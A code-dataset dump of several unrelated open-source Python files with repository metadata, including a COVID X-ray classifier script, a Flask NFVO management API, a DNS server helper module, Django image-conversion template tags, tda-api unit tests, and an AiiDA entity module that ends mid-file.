ChirilaLaura/covid-z
|
f1cc0818831519404486cd2fd2e78c36b789de24
|
[
"MIT"
] | null | null | null |
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
import argparse
import imutils
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-m1", "--model1", required=True, help="path to model1")
ap.add_argument("-m2", "--model2", required=True, help="path to model2")
ap.add_argument("-i", "--image", required=True, help="path to image")
args = vars(ap.parse_args())
image = cv2.imread(args["image"])
orig = image.copy()
image = cv2.resize(image, (64, 64))
image = image.astype("float") / 255.0
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
model1 = load_model(args["model1"])
model2 = load_model(args["model2"])
print("models loaded")
(other, xray) = model1.predict(image)[0]
label2 = "Xray" if xray > other else "Other"
proba = "Xray" if xray > other else other
label = "{}: {:.2f}%".format(label2, proba * 100)
if label2 == "Xray":
(infected, healthy) = model2.predict(image)[0]
label2 = "Healthy" if healthy > infected else "Infected"
proba = "Healthy" if healthy > infected else "Infected"
label = "{}: {:.2f}%".format(label2, proba * 100)
output = imutils.resize(orig, width=400)
cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)
cv2.imshow("Output", output)
cv2.waitKey(0)
else:
output = imutils.resize(orig, width=400)
cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)
cv2.imshow("Output", output)
cv2.waitKey(0)
| 31.895833
| 88
| 0.674722
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 240
| 0.15676
|
65ac8cde7af97a0e6637820254f0d7a893315eae
| 143
|
py
|
Python
|
src/settings.py
|
MichaelJWelsh/bot-evolution
|
6d8e3449fc5350f47e91a6aa7a3e8b719c0c2f16
|
[
"MIT"
] | 151
|
2017-05-01T02:47:34.000Z
|
2022-01-21T17:08:11.000Z
|
src/settings.py
|
MichaelJWelsh/bot-evolution
|
6d8e3449fc5350f47e91a6aa7a3e8b719c0c2f16
|
[
"MIT"
] | null | null | null |
src/settings.py
|
MichaelJWelsh/bot-evolution
|
6d8e3449fc5350f47e91a6aa7a3e8b719c0c2f16
|
[
"MIT"
] | 26
|
2017-05-01T21:41:02.000Z
|
2021-12-21T11:40:20.000Z
|
"""
This module contains the general settings used across modules.
"""
FPS = 60
WINDOW_WIDTH = 1100
WINDOW_HEIGHT = 600
TIME_MULTIPLIER = 1.0
| 15.888889
| 62
| 0.748252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.48951
|
65ad5e7a545499575a16b2d06ffd961696d9832d
| 7,974
|
py
|
Python
|
katana-nbi/katana/api/nfvo.py
|
afoteas/katana-slice_manager
|
f03a8520fc06f7bed18ff5c2a01a9b8ea7da84c8
|
[
"Apache-2.0"
] | null | null | null |
katana-nbi/katana/api/nfvo.py
|
afoteas/katana-slice_manager
|
f03a8520fc06f7bed18ff5c2a01a9b8ea7da84c8
|
[
"Apache-2.0"
] | null | null | null |
katana-nbi/katana/api/nfvo.py
|
afoteas/katana-slice_manager
|
f03a8520fc06f7bed18ff5c2a01a9b8ea7da84c8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
from logging import handlers
import pickle
import time
import uuid
from bson.binary import Binary
from bson.json_util import dumps
from flask import request
from flask_classful import FlaskView
import pymongo
from requests import ConnectTimeout, ConnectionError
from katana.shared_utils.mongoUtils import mongoUtils
from katana.shared_utils.nfvoUtils import osmUtils
# Logging Parameters
logger = logging.getLogger(__name__)
file_handler = handlers.RotatingFileHandler("katana.log", maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
stream_formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
class NFVOView(FlaskView):
route_prefix = "/api/"
req_fields = ["id", "nfvousername", "nfvopassword", "nfvoip", "tenantname"]
def index(self):
"""
Returns a list of nfvo and their details,
used by: `katana nfvo ls`
"""
nfvo_data = mongoUtils.index("nfvo")
return_data = []
for infvo in nfvo_data:
return_data.append(
dict(
_id=infvo["_id"],
nfvo_id=infvo["id"],
created_at=infvo["created_at"],
type=infvo["type"],
)
)
return dumps(return_data), 200
# @route('/all/') #/nfvo/all
def all(self):
"""
Same with index(self) above, but returns all nfvo details
"""
return dumps(mongoUtils.index("nfvo")), 200
def get(self, uuid):
"""
Returns the details of specific nfvo,
used by: `katana nfvo inspect [uuid]`
"""
data = mongoUtils.get("nfvo", uuid)
if data:
return dumps(data), 200
else:
return "Not Found", 404
def post(self):
"""
Add a new nfvo. The request must provide the nfvo details.
used by: `katana nfvo add -f [yaml file]`
"""
new_uuid = str(uuid.uuid4())
request.json["_id"] = new_uuid
request.json["created_at"] = time.time() # unix epoch
request.json["tenants"] = {}
if request.json["type"] == "OSM":
# Create the NFVO object
try:
osm_username = request.json["nfvousername"]
osm_password = request.json["nfvopassword"]
osm_ip = request.json["nfvoip"]
osm_project_name = request.json["tenantname"]
nfvo_id = request.json["id"]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
osm = osmUtils.Osm(nfvo_id, osm_ip, osm_username, osm_password, osm_project_name)
try:
osm.getToken()
except ConnectTimeout as e:
logger.exception("Connection Timeout: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
except ConnectionError as e:
logger.exception("Connection Error: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
else:
# Store the osm object to the mongo db
thebytes = pickle.dumps(osm)
obj_json = {"_id": new_uuid, "id": request.json["id"], "obj": Binary(thebytes)}
try:
new_uuid = mongoUtils.add("nfvo", request.json)
except pymongo.errors.DuplicateKeyError:
return f"NFVO with id {nfvo_id} already exists", 400
mongoUtils.add("nfvo_obj", obj_json)
# Get information regarding VNFDs and NSDs
osm.bootstrapNfvo()
return f"Created {new_uuid}", 201
else:
response = dumps({"error": "This type nfvo is not supported"})
return response, 400
def delete(self, uuid):
"""
Delete a specific nfvo.
used by: `katana nfvo rm [uuid]`
"""
del_nfvo = mongoUtils.get("nfvo", uuid)
if del_nfvo:
if del_nfvo["tenants"]:
return "Cannot delete nfvo {} - In use".format(uuid), 400
mongoUtils.delete("nfvo_obj", uuid)
mongoUtils.delete_all("nsd", {"nfvo_id": del_nfvo["id"]})
mongoUtils.delete_all("vnfd", {"nfvoid": del_nfvo["id"]})
mongoUtils.delete("nfvo", uuid)
return "Deleted NFVO {}".format(uuid), 200
else:
# if uuid is not found, return error
return "Error: No such nfvo: {}".format(uuid), 404
def put(self, uuid):
"""
Update the details of a specific nfvo.
used by: `katana nfvo update -f [yaml file] [uuid]`
"""
data = request.json
data["_id"] = uuid
old_data = mongoUtils.get("nfvo", uuid)
if old_data:
data["created_at"] = old_data["created_at"]
data["tenants"] = old_data["tenants"]
try:
for entry in self.req_fields:
if data[entry] != old_data[entry]:
return "Cannot update field: " + entry, 400
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
mongoUtils.update("nfvo", uuid, data)
return f"Modified {uuid}", 200
else:
new_uuid = uuid
data = request.json
data["_id"] = new_uuid
data["created_at"] = time.time() # unix epoch
data["tenants"] = {}
if request.json["type"] == "OSM":
# Create the NFVO object
try:
osm_username = request.json["nfvousername"]
osm_password = request.json["nfvopassword"]
osm_ip = request.json["nfvoip"]
osm_project_name = request.json["tenantname"]
nfvo_id = request.json["id"]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
osm = osmUtils.Osm(
nfvo_id, osm_ip, osm_username, osm_password, osm_project_name
)
try:
osm.getToken()
except ConnectTimeout as e:
logger.exception("Connection Timeout: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
except ConnectionError as e:
logger.exception("Connection Error: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
else:
# Store the osm object to the mongo db
thebytes = pickle.dumps(osm)
obj_json = {"_id": new_uuid, "id": data["id"], "obj": Binary(thebytes)}
try:
new_uuid = mongoUtils.add("nfvo", data)
except pymongo.errors.DuplicateKeyError:
return f"NFVO with id {nfvo_id} already exists", 400
mongoUtils.add("nfvo_obj", obj_json)
# Get information regarding VNFDs and NSDs
osm.bootstrapNfvo()
else:
response = dumps({"error": "This type nfvo is not supported"})
return response, 400
return f"Created {new_uuid}", 201
| 39.088235
| 97
| 0.538375
| 7,027
| 0.881239
| 0
| 0
| 0
| 0
| 0
| 0
| 2,240
| 0.280913
|
65ad681676318e198f9ba24f925ddf67a7312897
| 7,400
|
py
|
Python
|
helpers.py
|
mochja/ISA-DNS
|
463713b97329b000721be2512c9581c4881d664c
|
[
"MIT"
] | null | null | null |
helpers.py
|
mochja/ISA-DNS
|
463713b97329b000721be2512c9581c4881d664c
|
[
"MIT"
] | null | null | null |
helpers.py
|
mochja/ISA-DNS
|
463713b97329b000721be2512c9581c4881d664c
|
[
"MIT"
] | null | null | null |
import threading
import traceback
import socketserver
import struct
import time
import sys
import http.client
import json
import uuid
import config
import dns.rdatatype
import dns.rdataclass
args = config.args
QTYPES = {1:'A', 15: 'MX', 6: 'SOA'}
custom_mx = uuid.uuid4().hex
# https://github.com/shuque/pydig GNUv2 (edited)
def txt2domainname(input, canonical_form=False):
"""turn textual representation of a domain name into its wire format"""
if input == ".":
d = b'\x00'
else:
d = b""
for label in input.split('.'):
label = label.encode('ascii')
if canonical_form:
label = label.lower()
length = len(label)
d += struct.pack('B', length) + label
return d
# https://github.com/shuque/pydig GNUv2 (edited)
def get_domainname(pkt, offset):
"""decode a domainname at the given packet offset; see RFC 1035"""
global count_compression
labellist = [] # a domainname is a sequence of labels
Done = False
while not Done:
llen, = struct.unpack('B', pkt[offset:offset+1])
if (llen >> 6) == 0x3: # compression pointer, sec 4.1.4
count_compression += 1
c_offset, = struct.unpack('!H', pkt[offset:offset+2])
c_offset = c_offset & 0x3fff # last 14 bits
offset +=2
rightmostlabels, junk = get_domainname(pkt, c_offset)
labellist += rightmostlabels
Done = True
else:
offset += 1
label = pkt[offset:offset+llen]
offset += llen
labellist.append(label)
if llen == 0:
Done = True
return (labellist, offset)
def ip2bytes(ip):
return struct.pack('!BBBB', *map(int, ip.split('.')))
# https://github.com/shuque/pydig GNUv2 (edited)
def pdomainname(labels):
"""given a sequence of domainname labels, return a quoted printable text
representation of the domain name"""
printables = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-*+'
result_list = []
for label in labels:
result = ''
for c in label:
if isinstance(c, int):
c_int, c_chr = c, chr(c)
else:
c_int, c_chr = ord(c), c.decode()
if c in printables:
result += c_chr
else:
result += ("\\%03d" % c_int)
result_list.append(result)
if result_list == ['']:
return "."
else:
return ".".join(result_list)
def resolve_remote(query):
domainName, type, klass = query
if type not in [1, 15, 6]:
return (3, [], [])
h1 = http.client.HTTPSConnection('dns.google.com')
h1.request('GET', '/resolve?name={}&type={}'.format(domainName, type))
r1 = h1.getresponse()
data = json.loads(r1.read().decode('utf-8'))
answers = []
if 'Answer' in data:
for answer in data['Answer']:
a = (answer['name'], answer['type'], klass, answer['TTL'], answer['data'])
answers.append(a)
authority = []
if 'Authority' in data:
for answer in data['Authority']:
a = (answer['name'], answer['type'], klass, answer['TTL'], answer['data'])
authority.append(a)
return (int(data['Status']), answers, authority)
def resolve_fake(query, ip):
domainName, type, klass = query
answers = []
if type not in [1, 15, 6]:
return (3, answers, [])
# sam sebe pan pri ostatnych
if type == 1:
a = (domainName, type, klass, 1, str(ip))
answers.append(a)
# sam sebe pan pri MX
if type == 15:
a = (domainName, type, klass, 1, '10 ' + domainName)
answers.append(a)
return (0, answers, [])
def build_answer_data(answer):
dn, type, cl, ttl, data = answer
if type == 1:
print('r: {}, type: {}, class {}, addr {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), data))
return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, 4) + ip2bytes(data)
if type == 15:
priority, addr = data.split(' ', 2)
if not addr.endswith('.'):
addr += '.'
print('r: {}, type: {}, class {}, preference {}, mx {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), priority, addr))
addr = txt2domainname(addr)
return txt2domainname(dn) + struct.pack('!HHIHH', type, cl, ttl, 2 + len(addr), int(priority)) + addr
if type == 6:
ns, hostmasta, serialNo, refresh, retry, expire, minTTL = data.split(' ')
if not ns.endswith('.'):
ns += '.'
if not hostmasta.endswith('.'):
hostmasta += '.'
print('r: {}, type: {}, class {}, mname {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), ns))
soa = txt2domainname(ns) + txt2domainname(hostmasta) + struct.pack('!IIIII', *map(int, [serialNo, refresh, retry, expire, minTTL]))
return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, len(soa)) + soa
raise Exception('cant create response for that')
def resolve_zones(query, rr):
dn, type, klass = query
normal = []
authoritative = []
for r in rr:
a = (dn, r.rdtype, r.rdclass, rr.ttl, str(r).replace('\\@', '.'))
if r.rdtype == 6:
authoritative.append(a)
else:
normal.append(a)
return (0, normal, authoritative)
def dns_response(request):
answer = b''
nswer = b''
flags = 0
ancount = 0
nscount = 0
status = 3 # default status not found
for q in request.queries:
(dn, type, cl) = q
print('q: {}, type: {}, class {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl)))
rr = None
for zone in config.zones:
try:
rr = zone.find_rdataset(dn, type)
break
except: pass
if rr is not None and args.mitm is None:
flags |= 1 << 10 # set authoritative
status, normal, authoritative = resolve_zones(q, rr)
else:
status, normal, authoritative = resolve_remote(q) if args.mitm is None or type in [6] else resolve_fake(q, str(args.mitm[0]))
for r in normal:
ancount += 1
answer += build_answer_data(r)
for r in authoritative:
nscount += 1
nswer += build_answer_data(r)
flags |= 1 << 15 # set QR to (1) - Response
flags |= 1 << 7 #
flags |= 1 << 8 #
flags |= status
id = struct.pack('!H', request.id)
flags = struct.pack('!H', flags)
qdcount = struct.pack('!H', 0)
ancount = struct.pack('!H', ancount)
nscount = struct.pack('!H', nscount)
arcount = struct.pack('!H', 0)
return id + flags + qdcount + ancount + nscount + arcount + \
answer + nswer
def parse_dns_record(rawdata, offset):
dn, offset = get_domainname(rawdata, offset)
dn = pdomainname(dn)
query_type, query_class = struct.unpack_from('!HH', rawdata, offset=offset)
offset += 10
query = dn, query_type, query_class
return (offset, query)
| 30.578512
| 148
| 0.553514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,172
| 0.158378
|
65ad8049b22c02c19b00ee9ceab0dd889c8339c3
| 3,278
|
py
|
Python
|
convert/templatetags/convert_tags.py
|
aino/aino-convert
|
f3bd773f02a9645c75bfbd773e747dd8dc6e08f4
|
[
"BSD-3-Clause"
] | 1
|
2015-07-15T07:40:19.000Z
|
2015-07-15T07:40:19.000Z
|
convert/templatetags/convert_tags.py
|
aino/aino-convert
|
f3bd773f02a9645c75bfbd773e747dd8dc6e08f4
|
[
"BSD-3-Clause"
] | null | null | null |
convert/templatetags/convert_tags.py
|
aino/aino-convert
|
f3bd773f02a9645c75bfbd773e747dd8dc6e08f4
|
[
"BSD-3-Clause"
] | null | null | null |
from django.template import Library, Node, TemplateSyntaxError
from django.utils.encoding import force_unicode
from convert.base import MediaFile, EmptyMediaFile, convert_solo
from convert.conf import settings
register = Library()
class ConvertBaseNode(Node):
def error(self, context):
if settings.CONVERT_DEBUG:
raise
elif self.as_var:
context[self.as_var] = EmptyMediaFile()
return ''
return EmptyMediaFile().tag
def success(self, context, dest):
if self.as_var:
context[self.as_var] = dest
return ''
return dest.tag
class ThumbnailNode(ConvertBaseNode):
def __init__(self, input_file, options, as_var):
self.input_file = input_file
self.options = options
self.as_var = as_var
def render(self, context):
try:
input_file = force_unicode(self.input_file.resolve(context))
options = self.options.resolve(context)
source = MediaFile(input_file)
dest = source.thumbnail(options)
except:
return self.error(context)
return self.success(context, dest)
class ConvertNode(ConvertBaseNode):
def __init__(self, input_file, options, ext,
as_var):
self.input_file = input_file
self.options = options
self.ext = ext
self.as_var = as_var
def render(self, context):
try:
input_file = force_unicode(self.input_file.resolve(context))
options = self.options.resolve(context)
ext = self.ext and self.ext.resolve(context)
if not input_file:
dest = convert_solo(options, ext)
else:
source = MediaFile(input_file)
dest = source.convert(options, ext)
except:
return self.error(context)
return self.success(context, dest)
@register.tag
def thumbnail(parser, token):
args = token.split_contents()
invalid_syntax = TemplateSyntaxError('Invalid syntax.\nGot: %s\n'
'Expected: thumbnail "input-file" "options" [as var]'
% " ".join(args))
as_var = None
if len(args) not in (3, 5):
raise invalid_syntax
if args[-2] == 'as':
as_var = args[-1]
args = args[:-2]
if len(args) != 3:
raise invalid_syntax
input_file, options = map(parser.compile_filter, args[1:])
return ThumbnailNode(input_file, options, as_var)
@register.tag
def convert(parser, token):
args = token.split_contents()
invalid_syntax = TemplateSyntaxError('Invalid syntax.\nGot: %s.\n'
'Expected: convert "input-file" "options" ["extension"] '
'[as var]' % " ".join(args))
as_var = None
ext = None
if len(args) < 3:
raise invalid_syntax
if args[-2] == 'as':
as_var = args[-1]
args = args[:-2]
if len(args) == 4:
ext = parser.compile_filter(args.pop(3))
if len(args) != 3:
raise invalid_syntax
input_file, options = map(parser.compile_filter,
args[1:])
return ConvertNode(input_file, options, ext, as_var)
| 31.519231
| 73
| 0.589079
| 1,734
| 0.528981
| 0
| 0
| 1,274
| 0.388652
| 0
| 0
| 195
| 0.059487
|
65ad9a16451cd40a1e7a1f6a7b00166acc44cfb1
| 7,826
|
py
|
Python
|
tests/utils_test.py
|
lovetrading10/tda-api
|
0e38c85739248fbf3b0e3386eb2fb9bf9298f93d
|
[
"MIT"
] | 7
|
2020-05-03T16:25:08.000Z
|
2021-11-03T22:08:27.000Z
|
tests/utils_test.py
|
lovetrading10/tda-api
|
0e38c85739248fbf3b0e3386eb2fb9bf9298f93d
|
[
"MIT"
] | null | null | null |
tests/utils_test.py
|
lovetrading10/tda-api
|
0e38c85739248fbf3b0e3386eb2fb9bf9298f93d
|
[
"MIT"
] | 11
|
2020-06-26T22:09:05.000Z
|
2022-02-13T13:30:52.000Z
|
from unittest.mock import MagicMock
import datetime
import json
import unittest
from tda.orders import EquityOrderBuilder
from tda.utils import Utils
from . import test_utils
class MockResponse:
def __init__(self, json, ok, headers=None):
self._json = json
self.ok = ok
self.headers = headers if headers is not None else {}
def json(self):
return self._json
class UtilsTest(unittest.TestCase):
def setUp(self):
self.mock_client = MagicMock()
self.account_id = 10000
self.utils = Utils(self.mock_client, self.account_id)
self.order_id = 1
self.maxDiff = None
##########################################################################
# extract_order_id tests
def test_extract_order_id_order_not_ok(self):
response = MockResponse({}, False)
with self.assertRaises(ValueError, msg='order not successful'):
self.utils.extract_order_id(response)
def test_extract_order_id_no_location(self):
response = MockResponse({}, True, headers={})
self.assertIsNone(self.utils.extract_order_id(response))
def test_extract_order_id_no_pattern_match(self):
response = MockResponse({}, True, headers={
'Location': 'https://api.tdameritrade.com/v1/accounts/12345'})
self.assertIsNone(self.utils.extract_order_id(response))
def test_get_order_nonmatching_account_id(self):
response = MockResponse({}, True, headers={
'Location':
'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(
self.account_id + 1)})
with self.assertRaises(
ValueError, msg='order request account ID != Utils.account_id'):
self.utils.extract_order_id(response)
def test_get_order_success(self):
order_id = self.account_id + 100
response = MockResponse({}, True, headers={
'Location':
'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(
self.account_id, order_id)})
self.assertEqual(order_id, self.utils.extract_order_id(response))
##########################################################################
# find_most_recent_order tests
def order(self, time, symbol, quantity, instruction, order_type):
order = test_utils.real_order()
order['orderId'] = self.order_id
order['enteredTime'] = time
order['closeTime'] = time
order['accountId'] = self.account_id
order['orderType'] = order_type
order['orderLegCollection'][0]['quantity'] = quantity
order['orderLegCollection'][0]['instruction'] = instruction
order['orderLegCollection'][0]['instrument']['symbol'] = symbol
order['orderActivityCollection'][0]['executionLegs'][0]['time'] = time
order['orderActivityCollection'][0]['quantity'] = quantity
order['orderActivityCollection'][0]['executionLegs'][0]['quantity'] \
= quantity
self.order_id += 1
return order
def test_most_recent_order(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
order = self.utils.find_most_recent_order()
self.assertEqual(order2, order)
def test_too_many_order_legs(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order()
self.assertEqual(order2, out_order)
order2['orderLegCollection'].append(order2['orderLegCollection'][0])
out_order = self.utils.find_most_recent_order()
self.assertEqual(order1, out_order)
def test_non_equity_asset_type(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order()
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instrument']['assetType'] = 'OPTION'
out_order = self.utils.find_most_recent_order()
self.assertEqual(order1, out_order)
def test_different_symbol(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(symbol='AAPL')
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instrument']['symbol'] = 'MSFT'
out_order = self.utils.find_most_recent_order(symbol='AAPL')
self.assertEqual(order1, out_order)
def test_quantity_and_symbol(self):
msg = 'when specifying quantity, must also specify symbol'
with self.assertRaises(ValueError, msg=msg):
out_order = self.utils.find_most_recent_order(quantity=1)
def test_different_quantity(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
symbol='AAPL', quantity=1)
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['quantity'] = 10
out_order = self.utils.find_most_recent_order(
symbol='AAPL', quantity=1)
self.assertEqual(order1, out_order)
def test_different_instruction(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
instruction=EquityOrderBuilder.Instruction.BUY)
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instruction'] = 'SELL'
out_order = self.utils.find_most_recent_order(
instruction=EquityOrderBuilder.Instruction.BUY)
self.assertEqual(order1, out_order)
def test_different_order_type(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
order_type=EquityOrderBuilder.OrderType.MARKET)
self.assertEqual(order2, out_order)
order2['orderType'] = 'LIMIT'
out_order = self.utils.find_most_recent_order(
order_type=EquityOrderBuilder.OrderType.MARKET)
self.assertEqual(order1, out_order)
| 37.806763
| 80
| 0.625607
| 7,643
| 0.976616
| 0
| 0
| 0
| 0
| 0
| 0
| 1,678
| 0.214413
|
65ae5ae925181ff1d726f472dfbdd87ce820d687
| 9,535
|
py
|
Python
|
aiida/orm/entities.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | 1
|
2019-07-31T04:08:13.000Z
|
2019-07-31T04:08:13.000Z
|
aiida/orm/entities.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
aiida/orm/entities.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Module for all common top level AiiDA entity classes and methods"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import typing
from plumpy.base.utils import super_check, call_with_super_check
from aiida.common import exceptions
from aiida.common import datastructures
from aiida.common.lang import classproperty, type_check
from aiida.manage.manager import get_manager
__all__ = ('Entity', 'Collection')
EntityType = typing.TypeVar('EntityType') # pylint: disable=invalid-name
class Collection(typing.Generic[EntityType]): # pylint: disable=unsubscriptable-object
"""Container class that represents the collection of objects of a particular type."""
# A store for any backend specific collections that already exist
_COLLECTIONS = datastructures.LazyStore()
@classmethod
def get_collection(cls, entity_type, backend):
"""
Get the collection for a given entity type and backend instance
:param entity_type: the entity type e.g. User, Computer, etc
:type entity_type: :class:`aiida.orm.Entity`
:param backend: the backend instance to get the collection for
:type backend: :class:`aiida.orm.implementation.Backend`
:return: a new collection with the new backend
:rtype: :class:`aiida.orm.Collection`
"""
# Lazily get the collection i.e. create only if we haven't done so yet
return cls._COLLECTIONS.get((entity_type, backend), lambda: entity_type.Collection(backend, entity_type))
def __init__(self, backend, entity_class):
""" Construct a new entity collection.
:param backend: the backend instance to get the collection for
:type backend: :class:`aiida.orm.implementation.Backend`
:param entity_class: the entity type e.g. User, Computer, etc
:type entity_class: :class:`aiida.orm.Entity`
"""
assert issubclass(entity_class, Entity), "Must provide an entity type"
self._backend = backend or get_manager().get_backend()
self._entity_type = entity_class
def __call__(self, backend):
""" Create a new objects collection using a new backend.
:param backend: the backend instance to get the collection for
:type backend: :class:`aiida.orm.implementation.Backend`
:return: a new collection with the new backend
:rtype: :class:`aiida.orm.Collection`
"""
if backend is self._backend:
# Special case if they actually want the same collection
return self
return self.get_collection(self.entity_type, backend)
@property
def backend(self):
"""Return the backend.
:return: the backend instance of this collection
:rtype: :class:`aiida.orm.implementation.Backend`
"""
return self._backend
@property
def entity_type(self):
"""The entity type.
:rtype: :class:`aiida.orm.Entity`
"""
return self._entity_type
def query(self):
"""
Get a query builder for the objects of this collection
:return: a new query builder instance
:rtype: :class:`aiida.orm.QueryBuilder`
"""
# pylint: disable=no-self-use
from . import querybuilder
query = querybuilder.QueryBuilder()
query.append(self._entity_type, project='*')
return query
def get(self, **filters):
"""
Get a single collection entry that matches the filter criteria
:param filters: the filters identifying the object to get
:type filters: dict
:return: the entry
"""
res = self.find(filters=filters)
if not res:
raise exceptions.NotExistent("No {} with filter '{}' found".format(self.entity_type.__name__, filters))
if len(res) > 1:
raise exceptions.MultipleObjectsError("Multiple {}s found with the same id '{}'".format(
self.entity_type.__name__, id))
return res[0]
def find(self, filters=None, order_by=None, limit=None):
"""
Find collection entries matching the filter criteria
:param filters: the keyword value pair filters to match
:type filters: dict
:param order_by: a list of (key, direction) pairs specifying the sort order
:type order_by: list
:param limit: the maximum number of results to return
:type limit: int
:return: a list of resulting matches
:rtype: list
"""
query = self.query()
filters = filters or {}
query.add_filter(self.entity_type, filters)
if order_by:
query.order_by({self.entity_type: order_by})
if limit:
query.limit(limit)
return [_[0] for _ in query.all()]
def all(self):
"""
Get all entities in this collection
:return: A collection of users matching the criteria
:rtype: list
"""
return [_[0] for _ in self.query().all()]
class Entity(object): # pylint: disable=useless-object-inheritance
"""An AiiDA entity"""
_objects = None
# Define our collection type
Collection = Collection
@classproperty
def objects(cls, backend=None): # pylint: disable=no-self-use, no-self-argument
"""
Get a collection for objects of this type.
:param backend: the optional backend to use (otherwise use default)
:type backend: :class:`aiida.orm.implementation.Backend`
:return: an object that can be used to access entities of this type
:rtype: :class:`aiida.orm.Collection`
"""
backend = backend or get_manager().get_backend()
return cls.Collection.get_collection(cls, backend)
@classmethod
def get(cls, **kwargs):
# pylint: disable=redefined-builtin, invalid-name
return cls.objects.get(**kwargs) # pylint: disable=no-member
@classmethod
def from_backend_entity(cls, backend_entity):
"""
Construct an entity from a backend entity instance
:param backend_entity: the backend entity
:return: an AiiDA entity instance
"""
from . import implementation
type_check(backend_entity, implementation.BackendEntity)
entity = cls.__new__(cls)
entity.init_from_backend(backend_entity)
call_with_super_check(entity.initialize)
return entity
def __init__(self, backend_entity):
"""
:param backend_entity: the backend model supporting this entity
:type backend_entity: :class:`aiida.orm.implementation.BackendEntity`
"""
self._backend_entity = backend_entity
call_with_super_check(self.initialize)
def init_from_backend(self, backend_entity):
"""
:param backend_entity: the backend model supporting this entity
:type backend_entity: :class:`aiida.orm.implementation.BackendEntity`
"""
self._backend_entity = backend_entity
@super_check
